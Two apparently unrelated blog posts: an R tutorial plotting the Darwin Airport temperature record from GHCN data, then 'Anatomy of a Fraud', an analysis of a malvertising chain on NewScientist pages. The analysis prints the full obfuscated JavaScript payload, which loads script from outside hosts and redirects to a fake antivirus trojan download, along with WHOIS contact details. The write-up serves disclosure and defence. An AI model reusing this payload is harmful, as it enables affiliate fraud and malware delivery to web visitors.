Raw Darwin Airport Temperature Data with R

 

(download)

Traditionally, I have done statistical analyses using SAS. SAS provides an analyst with a pretty good environment; however, the system is expensive and programming via the SAS Macro Language leaves much to be desired. R, a freely available statistical programming language, is the open source response to SAS. Up until now, I have not done much programming in R. One reason for my lack of programming in R is that I don't have any interesting data to analyze. Forutnately, a series of tit-for-tat blog posts1,2,3,4 discussing the temperature record for Australia's Darwin Airport has changed this situation. My goal here is to use R to recreate Fig. 1,5 as shown above. I hope that you will follow along.

Getting the Data

First, we need to get the temperature record for Darwin Aiport. This data is contained in the Global Historical Climate Network (GHCN) Version 2 database, which is available for download from the National Climatic Data Center (NCDC). According to the NCDC, the GHCN database "contains historical temperature, precipitation, and pressure data for thousands of land stations worldwide."6 Since we are just interested in the temperature data, all we have to do is download the following files:

v2.mean.Z
A compressed file containing monthly mean station temperatures.
v2.mean_adj.Z
A compressed file containing monthly mean station temperatures statistically adjusted to offset "nonclimatic discontinuities" such as changes in instrument shelters or local station environments.
v2.temperature.inv
An inventory file containing station metadata.

It should be noted that I downloaded all of the above files on December 18th, 2009.

Preparing the Data

Now that we have the temperature data, we need to uncompress it. On UNIX, this can be done using the uncompress command.

> uncompress v2.mean.Z
> uncompress v2.mean_adj.Z

After uncompressing the files, each file should be larger and no longer have the ".Z" ending. Next, we need to find the identifier for the Darwin Airport station by searching the inventory file using the grep command.

> grep "DARWIN" v2.temperature.inv
50194120000 DARWIN AIRPOR                  -12.40  130.87   30   17U   56FLxxCO 3A 1WATER           C

Here, the identifier is the eleven-digit number at the beginning of the row (i.e. "50194120000"). It consists of a country code (3 digits), station number (5 digits), and a modifier (3 digits). We can also confirm that we have the correct station by noting that the Darwin Airport is indeed located at 12°40'S latitude and 130°87'E longitude.

Loading the Data into R

Once we have the station identifier, we can start up our R environment7 and then load the raw temperature data from the v2.mean file into it via the read.fwf command. We can learn more about that command, or any other R command, by prefixing it with a question mark.

> ?read.fwf

Since the v2.mean file has a fixed-width format, we must specify the width, name, and class of each of its columns. Additionally, we need to tell R that missing monthly temperature values are coded as -9999.

> months <- c("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep",
    "Oct", "Nov", "Dec")
> colw <- c(11, 1, 4, rep(5, 12))
> coln <- c("Id", "Rec", "Year", months)
> colc <- c("character", "factor", "numeric", rep("numeric", 12))
> raw <- read.fwf("v2.mean", colw, col.names=coln, na.strings="-9999",
    colClasses=colc)

It may take awhile for R to load all of the data. After R finishes loading the data, we can use the summary and attributes commands to verify that the data was loaded correctly. R reports that the dataset that I am using has 595,759 rows.

Plotting the Data

Before we can actually plot the raw Darwin Airport temperature data, we must first calculate yearly mean station temperatures. We can accomplish this by using the rowMeans command to average all of the monthly temperatures on a per row (i.e. year) basis. It should be noted that each row mean is divided by a factor of 10 in order to convert it into degrees Celsius.

> raw$RawMeanTemp <- rowMeans(raw[, months], na.rm=TRUE)/10
> raw.globe <- raw[, c("Id", "Rec", "Year", "RawMeanTemp")]

Next, we must subset out the temperature data for Darwin Airport, split this data into the five individual records that make up the overall Darwin Airport temperature record, and create time series8 out of each these records.

> raw.darwin <- subset(raw.globe, Id == "50194120000")
> raw.darwin.recs <- split(raw.darwin, f=raw.darwin[, "Rec"], drop=TRUE)
> for (i in 1:length(raw.darwin.recs)) {
    varname <- paste("rec", i, sep=".")
    assign(varname, ts(raw.darwin.recs[[i]][, "RawMeanTemp"],
        start=raw.darwin.recs[[i]][1, "Year"]))
}

Finally, all that's left for us to do is to plot the time series.

> ts.plot(rec.1, rec.2, rec.3, rec.4, rec.5,
    col=c("blue", "purple", "red", "pink", "lightblue"),
    main="Fig.2 - Five Raw Darwin Temperature Records from GHCN",
    type="o",
    ylab="Temp (C)")

The result is shown in Fig. 2 above. It's not pretty, but it looks like it agrees with Fig. 1 and it should provide us with a good starting point for future analyses.


  1. Eschenbach, W. (2009-12-08). The Smoking Gun At Darwin Zero. Watts Up With That?
  2. Scepticism's limits. (2009-12-11). The Economist.
  3. Eschenbach, W. (2009-12-12). Willis: Reply to the Economist. Watts Up With That?
  4. Climate manipulation gun still notably smoke-free. (2009-12-14). The Economist.
  5. Eschenbach (2009-12-08). Figure 5.
  6. GHCN-Monthly Version 2. (2008-08-20). NOAA.
  7. R version 2.6.2 (2008-02-08). On Ubuntu, you can install R via the apt-get utility. You will want to install the r-base and r-base-dev packages.
  8. Shumway, R. H., & Stoffer, D. S. (2006). An R Time Series Tutorial. For, Time Series Analysis and Its Applications: With R Examples (2nd Ed.). New York: Springer-Verlag.

Anatomy of a Fraud

Now that I have a blog, I can document some of the malware that I come across. The impetus behind this post is a retweeted link to a NewScientist story entitled "Genome firm shoots itself in the foot."

The problem starts with the fact that the NewScientist uses ADTECH to serve banner ads via some JavaScript magic. The way the JavaScript magic works is as follows:

  1. A NewScientist web page requests JavaScript from an ADTECH server.
  2. The ADTECH server responds with a JavaScript that contains a request for another JavaScript from a 3rd party server.
  3. Periodically, "farmingtoncp.com" is the 3rd party server from which the ultimate JavaScript is requested.

The problem with "farmingtoncp.com" is that it occasionally delivers the following JavaScript:

document.write(unescape("%3Ca href='http%3A%2F%2Fjetblue.com%2F%3F%3D3468' target='_blank'%3E%3Cimg src='http://farmingtoncp.com/bdb/Jetblue/728x90_upd.jpg' border='0' %3E%3C/a%3E")); statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60); var cd1 = "ine"; var cd2 = "rsard.co"; var cd3 = "m"; var cur_domain = cd1 + cd2 + cd3; var all_t = "-10,-9,-8,-7,-6,-5,-4,-3,-1,0,1"; var mtch = all_t.match(statictml); if ( mtch == null ) { document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=191959845&s=1&e=0' style='visibility:hidden;' width='0' height='0' %3E%3C/iframe%3E")); } else { var abc = "http://nokian-d"; var def = "iscounts.cn/go.php?i"; var klm = "d=2006-51&key=0522c7066&d=1"; var action_URL = abc + def + klm; eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%22%25%33%43%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%22%20%2B%20%63%75%72%5F%64%6F%6D%61%69%6E%20%2B%20%22%2F%69%6E%63%6C%75%64%65%73%30%32%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%25%33%45%25%33%43%2F%73%63%72%69%70%74%25%33%45%22%29%29%3B')); } //!mtch

This JavaScript may look complex, but it is really quite simple. Its mission is two-fold. First, it sets up a banner ad for JetBlue Airways. If one clicks on the ad, the fraudsters earn a commission via JetBlue's affiliate program run by Commission Junction. The offending JetBlue URL containing the affiliate code is as follows:

http://jetblue.com/?=3468

Secondly, the JavaScript contacts a server at "inersard.com" in order to trigger a redirect to an action_URL, which, in this case, points to a server at the "nokian-discounts.cn" domain name.

From a user's perspective, all of the above happens in an instant so that the page at the NewScientist is bypassed and, in its place, one gets a scary page that declares that "your PC needs to install antimalware software! Antivir can perform fast and free scan of your computer." Unfortunately, if one downloads this antimalware software, one gets a 184,320 byte .exe file (MD5: 800dae61b734f31c9dab82cbd4135594) from "n6-scanner.com" that is really a Trojan horse known as Trojan.Agent.180224.

As you can see, these kinds of scams involve several entities, including many legitimate businesses. Such complexity makes halting Internet-based fraud almost impossible. Still, I hope that this is the last time that I have to deal with malware being delivered over an ad network.

Addendum

The (presumably fake) WHOIS information for each of the sites listed above:

Kelly Lattimore dns@farmingtoncp.com
618-329-3335 fax: 618-329-3335
273 Eagle Street
Oakdale IL 62268
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2009-12-02
Expires: 2010-12-02

Steve Garcia admin@inersard.com
218-597-0073 fax: 218-597-0073
1427 Terra Cotta St
Strandquist MN 56758
us

DNS:
ns1.everydns.net
ns2.everydns.net

Created: 2009-12-21
Expires: 2010-12-21

Domain Name: nokian-discounts.cn
ROID: 20091213s10001s02831682-cn
Domain Status: clientTransferProhibited
Administrative Email: jeya32jay@live.co.uk
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Name Server:ns3.everydns.net
Name Server:ns4.everydns.net
Registration Date: 2009-12-13 21:36
Expiration Date: 2010-12-13 21:36

Domain Name: n6-scanner.com
Henry Nguyen Gong contact@privacy-protect.cn
+33.0466583875 fax: +33.0466583875
Rue la produit 34
Nimes Languedoc-Roussillon 30189
fr

DNS:
ns1.everydns.net
ns2.everydns.net
ns3.everydns.net
ns4.everydns.net

Created: 2009-12-20
Expires: 2010-12-20